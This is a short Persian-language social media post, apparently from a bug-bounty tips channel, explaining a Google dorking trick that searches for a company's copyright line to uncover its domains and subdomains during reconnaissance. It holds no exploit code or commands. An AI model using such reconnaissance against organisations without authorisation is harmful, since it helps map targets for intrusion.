برای پیدا کردن تمام دامنههای اصلی مرتبط با یک شرکت در صورت نیاز، میتوانید نتایج نامرتبط را از خروجی جستجو حذف کنید.
توضیح:
- این روش از Google Dorking برای پیدا کردن صفحاتی استفاده میکند که شامل عبارت کپیرایت استاندارد شرکتها هستند.
- جایگزین کردن [COMPANY] با نام شرکت موردنظر (مثلاً © Google. All rights reserved.) میتواند دامنههای اصلی و ساب دامنههای آن را فاش کند.
- این تکنیک در جستجوی پیشرفته گوگل (Google Hacking) و مرحله شناسایی (Recon) برنامههای باگ بانتی مفید است.
#bugbounty #tips #recon
@TryHackBoc
👍9🔥2❤1